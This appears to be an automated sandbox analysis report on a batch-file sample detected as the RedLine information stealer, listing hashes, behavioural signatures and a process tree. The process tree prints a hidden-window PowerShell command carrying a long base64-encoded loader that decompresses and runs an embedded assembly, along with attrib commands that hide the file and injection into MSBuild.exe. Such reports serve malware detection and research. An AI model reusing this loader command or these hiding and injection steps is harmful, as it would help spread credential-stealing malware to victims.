Analysis
-
max time kernel
137s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-11-2024 19:11
Static task
static1
Behavioral task
behavioral1
Sample
New folder/08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
New folder/08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
New folder/8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
New folder/8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
New folder/fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat
Resource
win7-20241023-en
Behavioral task
behavioral6
Sample
New folder/fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat
Resource
win10v2004-20241007-en
General
-
Target
New folder/08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat
-
Size
1.1MB
-
MD5
ab0d98e0b9af05d94e139284507c0d3b
-
SHA1
0d3297b0a0bce6f0dde0b91146a66ed78c9b9d2c
-
SHA256
08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d
-
SHA512
f260e37db9c406ba6a6ae5c1472def4e545af5366e9d514066470d7a8506b85f01ce6a1ee274d7cf137a11684268379cddeab8f055ffe75d150b264fdee1884c
-
SSDEEP
24576:w9vetj7JB95zNrhS01VX3LBc41Y35qdJQhgjGlCG9LuPQV+J7zrzLElSmRxx7o:jrXn+30QeGoU4TElSr
Malware Config
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1312-30-0x0000000000400000-0x0000000000428000-memory.dmp family_redline -
Redline family
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Executes dropped EXE 1 IoCs
Processes:
08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exepid process 3472 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exedescription pid process target process PID 3472 set thread context of 1312 3472 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe MSBuild.exe -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exeMSBuild.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exepid process 3472 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe 3472 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exedescription pid process Token: SeDebugPrivilege 3472 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
cmd.exe08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exedescription pid process target process PID 3492 wrote to memory of 3768 3492 cmd.exe attrib.exe PID 3492 wrote to memory of 3768 3492 cmd.exe attrib.exe PID 3492 wrote to memory of 3472 3492 cmd.exe 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe PID 3492 wrote to memory of 3472 3492 cmd.exe 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe PID 3492 wrote to memory of 3472 3492 cmd.exe 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe PID 3472 wrote to memory of 1312 3472 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe MSBuild.exe PID 3472 wrote to memory of 1312 3472 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe MSBuild.exe PID 3472 wrote to memory of 1312 3472 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe MSBuild.exe PID 3472 wrote to memory of 1312 3472 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe MSBuild.exe PID 3472 wrote to memory of 1312 3472 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe MSBuild.exe PID 3472 wrote to memory of 1312 3472 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe MSBuild.exe PID 3472 wrote to memory of 1312 3472 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe MSBuild.exe PID 3472 wrote to memory of 1312 3472 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe MSBuild.exe PID 3492 wrote to memory of 3340 3492 cmd.exe attrib.exe PID 3492 wrote to memory of 3340 3492 cmd.exe attrib.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 3768 attrib.exe 3340 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3492 -
C:\Windows\system32\attrib.exeattrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe2⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3768
-
-
C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe"C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAG54KgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwBueCcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3472 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe3⤵
- System Location Discovery: System Language Discovery
PID:1312
-
-
-
C:\Windows\system32\attrib.exeattrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe2⤵
- Views/modifies file attributes
PID:3340
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe
Filesize423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82